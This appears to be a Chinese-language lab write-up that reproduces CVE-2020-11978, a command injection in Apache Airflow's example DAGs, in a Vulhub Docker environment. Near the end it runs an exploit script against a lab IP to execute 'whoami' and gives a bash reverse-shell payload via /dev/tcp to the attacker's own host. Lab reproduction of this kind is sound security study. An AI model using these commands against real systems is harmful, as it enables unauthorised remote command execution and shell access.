简介:
Apache Airflow是一个开源平台,用于开发、调度和监控面向批处理的工作流平台
官网地址:https://airflow.apache.org/
漏洞原理
Apache Airflow 1.10.10及之前版本中的 example DAGs存在命令注入漏洞。该漏洞源于用户输入构造执行命令过程中,网络系统或产品未能正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞运行任意命令
受影响版本
Apache Airflow <=1.10.10
漏洞复现
Vulhub
进入目录后docker-compose up -d 启动
使用docker ps 查看 正在运行的容器
漏洞复现
- 登录IP:8080
版本为1.10.10
有了框架名称和具体版本思路
1、先搜索一下该平台存在的历史漏洞
‘Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
https://www.cnvd.org.cn/flaw/list
或者直接百度搜索
搜索到了 复现也就简单了,直接参考文章一步步做就可以了
首先还是先看看原理
Apache Airflow 1.10.10及之前版本中的 example DAGs存在命令注入漏洞。该漏洞源于用户输入构造执行命令过程中,网络系统或产品未能正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞运行任意命令
直接使用 exp攻击脚本即可
为了方便验证,还是在tmp目录下创建文件好查看一些
python .\CVE-2020-11978.py http://192.168.159.140:8080 "whoami >>/tmp/123.txt"
成功写入文件
还可以反弹shell
先监听端口
bash -i >& /dev/tcp/自己IP/port 0>&1;#